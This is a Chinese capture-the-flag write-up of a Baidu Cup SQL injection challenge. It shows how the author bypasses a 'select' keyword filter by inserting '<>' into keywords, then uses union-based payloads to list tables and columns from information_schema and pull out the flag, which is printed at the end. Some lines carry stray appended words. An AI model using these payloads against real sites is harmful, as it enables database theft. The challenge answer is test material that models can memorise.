sql注入用<>繞過被過濾的select ——百度杯9月第二場SQL
題目提示SQL注入,打開源代碼發現<!--SELECT * FROM info WHERE id=1-->code
嘗試union select 1,2,3提示inj code!orm
通過屢次嘗試以後發現select已經被過濾,因而百度繞過select過濾的方法,/*!%53eLEct*/,發現依舊沒法繞過select過濾it
通過再次嘗試後發現能夠用<>進行繞過,因而構造payload un<>ion sel<>ect 1,2,3io
返回了一個2,說明第二個字段能夠顯示table
構建payload查詢表名 un<>ion sel<>ect 1,group_concat(table_name) ,3from information_shema.tables where table_schema=database()form
發現有info表百度
構建payload查詢字段 un<>ion sel<>ect 1,group_concat(column_name) ,3 from information_schema.columns where table_name=0x696e666f(info的16進制)select
發現有3個字段id,title,flAg_T5ZNdrmnio
構建payload獲取字段 un<>ion sel<>ect 1,group_concat(flAg_T5ZNdrm),3 from info方法
得到flag
flag{f24a0c69-ee21-47c8-b54d-60f7728c5e6e}
相關文章
- 1. SQL注入 -過濾繞過
- 2. SQL注入之select被過濾
- 3. sql注入過濾繞過實例
- 4. sql注入繞過
- 5. SQL注入繞過
- 6. web 百度杯 ctf 一道簡單的sql 注入繞過題目 sql
- 7. 「百度杯」CTF比賽 十二月場Blog(sql注入)
- 8. SQL注入de繞過
- 9. SQL注入檢測繞過
- 10. SQL注入繞過技術
- 更多相關文章...
- • PHP 過濾 unserialize() - PHP 7 新特性
- • PHP 過濾器 - PHP教程
- • Java Agent入門實戰(二)-Instrumentation源碼概述
- • C# 中 foreach 遍歷的用法
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. SQL注入 -過濾繞過
- 2. SQL注入之select被過濾
- 3. sql注入過濾繞過實例
- 4. sql注入繞過
- 5. SQL注入繞過
- 6. web 百度杯 ctf 一道簡單的sql 注入繞過題目 sql
- 7. 「百度杯」CTF比賽 十二月場Blog(sql注入)
- 8. SQL注入de繞過
- 9. SQL注入檢測繞過
- 10. SQL注入繞過技術